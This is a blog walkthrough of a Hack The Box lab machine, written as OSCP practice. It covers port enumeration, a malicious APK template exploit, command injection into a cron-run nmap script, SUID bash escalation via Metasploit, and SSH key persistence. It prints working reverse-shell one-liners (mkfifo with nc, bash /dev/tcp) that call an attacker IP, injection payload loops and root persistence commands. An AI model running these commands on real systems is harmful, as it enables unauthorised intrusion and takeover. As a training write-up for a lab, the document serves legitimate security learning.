Follow along in my OSCP journey, this is my target 12 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.226
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Aggressive OS guesses: Linux 2.6.32
This machine seems quite forward, there are 2 services, SSHand HTTP server. Let us see what they hold for us.
Web — 5000
I mean this type of page smells of command injection, let us see if that’s what we’ll find. It seems that we have 3 commands at our disposal to either scan, create payloads or find exploits.
Let’s be thorough. We first check the service version and any exploits against it.
We have Werkzeug httpd 0.16.1 which after running searchsploit against it we find:
Werkzeug - 'Debug Shell' Command Execution | exploits/multiple/remote/43905.py
But it requires the app to be running in debug mode which it isn’t.
Most likely a command injection but it turns out our expectations were a bit too high. All the injection characters seem to be filtered.
A couple of ideas come to mind: Since the payload generator is the only one that seems a bit more complex and has an upload function, we might be able to abuse it to either upload a reverse shell, generate a reverse shell that is stored on the device or use the template parameter. Let’s read the template documentation:
- Let’s try to use the filename of the template to exploit it
2. Generate a shell
We can see on the request if we click download that the payload is hosted on the server. These are really good news.
But we know from our scan that the server is a Linux machine, we’ll need a elf executable to make this work, however it seems like those don’t work …
Same if we try to upload the template, it’s an exe for windows and elf for linux so we can’t seem to upload what we want…
HINT
Ok so windows doesn’t work, linux doesn’t work … What are the options that we haven’t explored yet because they might not seems like they have a potential in the case we’re trying to break?
.
.
.
.
.
That android payload isn’t really something we have explored, as I don’t know much about APKs and how they could help, let’s do some research …
The exploit asks us a command we want to run then creates the malicious apk that we can upload to the server and that will run our command. Let’s test it out:
We upload it and setup a listener before running it of course:
We have RCE baby ❤ Let’s get ourselves a nice shell to work with, using something a mate showed me recently to get cmd reverse shells from msfvenom
sudo msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.46 LPORT=5555 -f raw
We copy the line and create our APK
We upload it
And BIM we’re in 💪
We se that we are the user kid
Privilege Escalation
Time for some shell upgrade 😉
- We try both python and python3
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let’s get the user flag
Now we have a proper shell
Improving our access
Let’s drop our public key in kid’s SSH authorized folder
- Copy the key
kali@kali:~/.ssh$ cat id_rsa.pub | xclip
2. Paste in the authorized file
cd /home/kid/.ssh
vi authorized_keys
SSH as kid
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The only thing that seems to be interesting is the other user on the server:
Let’s explore that user pwn
We have some interesting folders and files but we don’t have permissions to execute them but at least we can read the scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
# get the ip from the hackers file and runs nmap on it
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
# checks if the log file isn't empty, then cleans it up
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
If we look at the first line, cat $log | cut -d' ' -f3- |
it captures the 3rd value separated by spaces, sorts them and finally proceeds to read the code as input for nmap.
We know we can’t mess with the IPs through the UI because there is some kind of sanitization that block characters we need. So we have to do it on the backend.
But how do we forge a reverse shell without spaces …
Being familiar with cut
I am curious about the -f3-
that last "-" isn't usually there, let's read some documentation:
So it picks up everything after, let’s test it out and prepare our payload.
💪 The command actually picks everything after the 2nd space, let’s start crafting our payload:
#something something payload (with payload being an IP followed by a reverse shell
something something 127.0.0.1 ; mkfifo /tmp/evzhy; nc 10.10.14.46 6666 0</tmp/evzhy | /bin/bash >/tmp/evzhy 2>&1; rm /tmp/evzhy
Now the issue we have is that we don’t really know how to run the script and we didnt’ find anything in the folder we have access to that could explain it. We do know that the script does a clean up at the end of it. Let’s see if it runs. We write anything into the log file and a couple of seconds later it’s empty, it seems the script runs periodically 🙌
We create a loop that injects our payload
while :; do echo "something something 127.0.0.1 ; mkfifo /tmp/evzhy; nc 10.10.14.46 6666 0</tmp/evzhy | /bin/sh >/tmp/evzhy 2>&1; rm /tmp/evzhy" > hackers; done
And our listener comes back with a beautiful sight
Trying to get a stable shell we decide to change our payload to be able to upgrade it
while :; do echo "something something 127.0.0.1 ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.46/6666 0>&1' #" > hackers; done
Let’s TTY it (see the beginning of privilege escalation on how to do it)
Let’s check our quick wins and boom, we can run metasploit as root.
From here we can directly check the root flag:
Actually getting root
#inside metasploit
cp /bin/bash /tmp/bash && chmod +s /tmp/bash
exit
/tmp/bash -p
Improving our root access
Drop your SSH public key into the authorized_keys file
echo "<id_rsa.pub>" > /root/.ssh/authorized_keys
Now we truly own the server
What did I learn?
- Understanding what runs behind an initial application to possibly find exploits within libraries or other apps it is using (msf exploit)
- Reading a bash script and finding a command injection within
- How to improve our access after we obtain a certain shell.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.